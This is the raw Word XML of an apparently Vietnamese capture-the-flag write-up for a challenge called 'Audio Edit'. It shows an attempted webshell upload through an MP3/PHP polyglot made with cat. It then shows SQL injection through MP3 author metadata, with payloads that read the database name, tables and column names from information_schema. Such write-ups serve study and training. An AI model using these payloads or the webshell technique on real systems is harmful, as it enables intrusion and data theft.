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7186" w14:textId="3A25E57E" w:rsidR="002F49FE" w:rsidRPr="00A5459B" w:rsidRDefault="00A5459B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5459B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1: Audio Edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE1D3A9" w14:textId="2481EE29" w:rsidR="00A5459B" w:rsidRDefault="00A5459B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279A66B9" w14:textId="350053C1" w:rsidR="00A5459B" w:rsidRDefault="00A5459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Đây là giao diện của trang web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899EE13" w14:textId="744F3C5F" w:rsidR="00A5459B" w:rsidRDefault="00A5459B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ECBF0D0" w14:textId="7094DF0D" w:rsidR="00A5459B" w:rsidRDefault="00A5459B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5F1163" w14:textId="0FCAB78D" w:rsidR="00A5459B" w:rsidRDefault="00A5459B" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:left="-567" w:right="-56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968C9B" wp14:editId="17BC0DEB">
            <wp:extent cx="2983230" cy="324548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84"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3001249" cy="326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A40BE5E" wp14:editId="1CCCAADF">
            <wp:extent cx="3177540" cy="32575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92"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3202671" cy="328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6294" w14:textId="5D57399A" w:rsidR="00A5459B" w:rsidRDefault="00A5459B" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:left="-567" w:right="-563"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7649AE8C" w14:textId="670284E5" w:rsidR="00A5459B" w:rsidRDefault="00A5459B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thử up file webshell.php nhưng nó báo lỗi : </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Invalid file format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B14132" w14:textId="391F0C9B" w:rsidR="00A5459B" w:rsidRDefault="00A5459B" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7733704B" w14:textId="63A41499" w:rsidR="00A5459B" w:rsidRDefault="00A5459B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thử điều chỉnh content-type là </w:t>
      </w:r>
      <w:r w:rsidRPr="00A5459B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application/x-httpd-php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay double extension nhưng cũng không được. Nó </w:t>
      </w:r>
      <w:r w:rsidR="003D578A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yêu cầu 1 file .mp3. Nhưng kích thước của file phải nhỏ thôi cỡ 200 mb mới được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B72DE4" w14:textId="1668446B" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39158660" w14:textId="78B1D9AF" w:rsidR="003D578A" w:rsidRDefault="003D578A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nghĩ đến php polygot file. Phải có 1 file test.mp3 và webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9093B" w14:textId="41E4039C" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636B5614" w14:textId="090EC7EA" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat test.mp3 webshell.php&gt; webshell.mp3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171816C1" w14:textId="122DAD2D" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5960A0" w14:textId="17785175" w:rsidR="003D578A" w:rsidRDefault="003D578A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Sau đó mình bật intercept lên, phải đổi webshell.mp3 là .php thì mới thực thi code được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9B57D" w14:textId="24148143" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AF9CC4" w14:textId="3DB55DE8" w:rsidR="003D578A" w:rsidRDefault="003D578A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Nhưng quan trọng là ứng dụng không cho mình biết file nằm ở đâu để thực thi. Nó cho chúng ta chỉnh sửa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E05D87" w14:textId="2C8A1CFF" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49871C8E" w14:textId="3CA74188" w:rsidR="003D578A" w:rsidRDefault="003D578A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A1439C" wp14:editId="4CA6F8E5">
            <wp:extent cx="432054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08"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="432054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9DE29" w14:textId="372AF30B" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BACB09" w14:textId="7835FCAA" w:rsidR="003D578A" w:rsidRDefault="003D578A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Và 1 điều nữa là file_name bạn đặt là gì đi nữa nó sẽ thay đổi </w:t>
      </w:r>
      <w:r w:rsidR="00D31D5F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>theo mong muốn của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2AFFE4" w14:textId="6EA7AAA9" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314B179F" w14:textId="345461CB" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31D5F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /audioedit/edit.php?file=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31D5F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d31f4643848a044c6b27d647fb4fec83efb9f499.mp3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5313755C" w14:textId="77777777" w:rsidR="003D578A" w:rsidRDefault="003D578A" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5D71FB" w14:textId="4C602AA3" w:rsidR="003D578A" w:rsidRDefault="00D31D5F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Nên lỗ hổng upload file không thể khai thác được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20508948" w14:textId="4CAF4F5F" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C84BC89" w14:textId="7F8A337F" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F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Nhưng bạn thấy Author và Title chứ: Unknown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E67E8D" w14:textId="6C91EB52" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FD8B9F" w14:textId="04013A04" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F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Đó là dữ liệu chúng ta có thể kiểm soát được. Làm như thế nào?</w:t>
      </w:r>
      <w:r w:rsidR="0058003D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mình sẽ chỉnh sửa metadata của 1 file .mp3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB59CF" w14:textId="5EB15322" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CF1FC9" w14:textId="1BB8EF99" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F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là trên mac, bạn bật ứng dụng music lên, chọn 1 bài hát và get info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC819F" w14:textId="60957DB6" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62049DDC" w14:textId="16CA7177" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F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15DB8F5" wp14:editId="78880F93">
            <wp:extent cx="5189220" cy="560391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92" cy="56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ADD5" w14:textId="5F183F48" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4040A172" w14:textId="1EB0C6EE" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F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sẽ chỉnh sửa title và artist là test và up lại trên app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC5513" w14:textId="7FE8B814" w:rsidR="00D31D5F" w:rsidRDefault="00D31D5F" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DEAD2FA" w14:textId="5D93C9D2" w:rsidR="00D31D5F" w:rsidRDefault="0058003D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666B39" wp14:editId="1C3CA507">
            <wp:extent cx="2271121" cy="13373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865" cy="13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53AF" w14:textId="1941249D" w:rsidR="0058003D" w:rsidRDefault="0058003D" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73264BD0" w14:textId="46EACC06" w:rsidR="0058003D" w:rsidRDefault="0058003D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vẻ ứng dụng đang dính lỗi sql injection (insert).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB6932" w14:textId="2E248031" w:rsidR="0058003D" w:rsidRDefault="0058003D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Giả định: insert into table_name (author,title) values (</w:t>
      </w:r>
      <w:r w:rsidRPr="0058003D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'test','test'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4956AE7E" w14:textId="1D70F7AF" w:rsidR="00434751" w:rsidRDefault="00434751" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DABB3C" w14:textId="77997D4D" w:rsidR="00434751" w:rsidRDefault="00434751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cho </w:t>
      </w:r>
      <w:r w:rsidR="00EC026E" w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>author: ',select@@version)--  ; title: test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668DDF8" w14:textId="10185B9F" w:rsidR="00EC026E" w:rsidRDefault="00EC026E" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117FA527" w14:textId="5F3C97F2" w:rsidR="00EC026E" w:rsidRDefault="00EC026E" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC026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Query: insert … values (</w:t>
      </w:r>
      <w:r w:rsidRPr="0058003D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,(select@@version))--</w:t>
      </w:r>
      <w:r w:rsidRPr="0058003D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,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC026E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0058003D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test</w:t>
      </w:r>
      <w:r w:rsidRPr="0058003D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329E1321" w14:textId="7550A842" w:rsidR="00EC026E" w:rsidRDefault="00EC026E" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3253F2EC" w14:textId="40583BB7" w:rsidR="00EC026E" w:rsidRDefault="00EC026E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Nó báo lỗi : </w:t>
      </w:r>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error inserting into database!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7B553" w14:textId="20F3DC77" w:rsidR="00EC026E" w:rsidRDefault="00EC026E" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465D7442" w14:textId="76F5C271" w:rsidR="00EC026E" w:rsidRDefault="00926DEF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đã sai comment, cơ sở dữ liệu là mysql nên comment là --+ hoặc #.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D316B6D" w14:textId="7BF31088" w:rsidR="00926DEF" w:rsidRDefault="00926DEF" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CE2CBD" w14:textId="79817AAE" w:rsidR="00926DEF" w:rsidRDefault="00926DEF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E2EE6B" wp14:editId="39C5EF7E">
            <wp:extent cx="332740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511B" w14:textId="7EC32D20" w:rsidR="00926DEF" w:rsidRDefault="00926DEF" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B4780F" w14:textId="61D97580" w:rsidR="00170615" w:rsidRDefault="00926DEF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Vì thủ tục hơi rườm rà nên mình mất rất nhiều thời gian </w:t>
      </w:r>
      <w:r w:rsidRPr="00926DEF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04C"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D9447" w14:textId="62AE4D65" w:rsidR="00926DEF" w:rsidRDefault="00926DEF" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DC0138" w14:textId="330064A3" w:rsidR="00926DEF" w:rsidRDefault="00E455B4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thử select table_name from information_schema.tables nhưng nó báo lỗi câu truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31219EE0" w14:textId="71D8D329" w:rsidR="00E455B4" w:rsidRDefault="00E455B4" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2629B94B" w14:textId="46785FD2" w:rsidR="00E455B4" w:rsidRDefault="00E455B4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Vì author chỉ trả về 1 hàng nên phải group_concat(table_name) nhưng dữ liệu trả về cũng không có ích cho việc khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1300DE92" w14:textId="2367545E" w:rsidR="00E455B4" w:rsidRDefault="00E455B4" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1C5F02" w14:textId="6378E716" w:rsidR="00E455B4" w:rsidRDefault="00E455B4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686EC4" wp14:editId="62B20BBB">
            <wp:extent cx="5943600" cy="858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353F" w14:textId="4CC69CEC" w:rsidR="00E455B4" w:rsidRDefault="00E455B4" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7EFAB9" w14:textId="65F9C5E8" w:rsidR="00E455B4" w:rsidRDefault="00685D2D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tìm thử cơ sở dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A424D" w14:textId="023E68D5" w:rsidR="00685D2D" w:rsidRDefault="00685D2D" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F48533A" w14:textId="64B41DEB" w:rsidR="00685D2D" w:rsidRDefault="00685D2D" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">author: </w:t>
      </w:r>
      <w:r w:rsidR="000D09B9" w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>',(select database()))--</w:t>
      </w:r>
      <w:r w:rsidR="00B30B45" w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="000D09B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D09B9" w:rsidRPr="000D09B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="000D09B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> audioedit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61255B99" w14:textId="7137F271" w:rsidR="00B30B45" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5CCE8B" w14:textId="6B4E83BC" w:rsidR="00B30B45" w:rsidRDefault="00B30B45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bảng trong cơ sở dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20B291" w14:textId="076F347A" w:rsidR="00B30B45" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503CF0F4" w14:textId="3575BA2C" w:rsidR="00B30B45" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>author: ',(select table_name FROM information_schema.tables WHERE table_type = 'base table' AND table_schema='audioedit'))--+</w:t>
      </w:r>
      <w:r w:rsidR="00F84946" w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F84946" w:rsidRPr="00F84946">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00F84946">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>audioedit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62431481" w14:textId="42767A58" w:rsidR="00B30B45" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="564067DF" w14:textId="23A448E9" w:rsidR="00B30B45" w:rsidRDefault="00B30B45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cột trong bảng audioedit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DE18B" w14:textId="0E12759B" w:rsidR="00B30B45" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4668D112" w14:textId="77777777" w:rsidR="00B30B45" w:rsidRPr="00D25421" w:rsidRDefault="00B30B45" w:rsidP="00A5459B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25421">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>author: ',(select group_concat(column_name) FROM information_schema.columns WHERE table_name='audioedit'))--+</w:t>
      </w:r>
    </w:p>
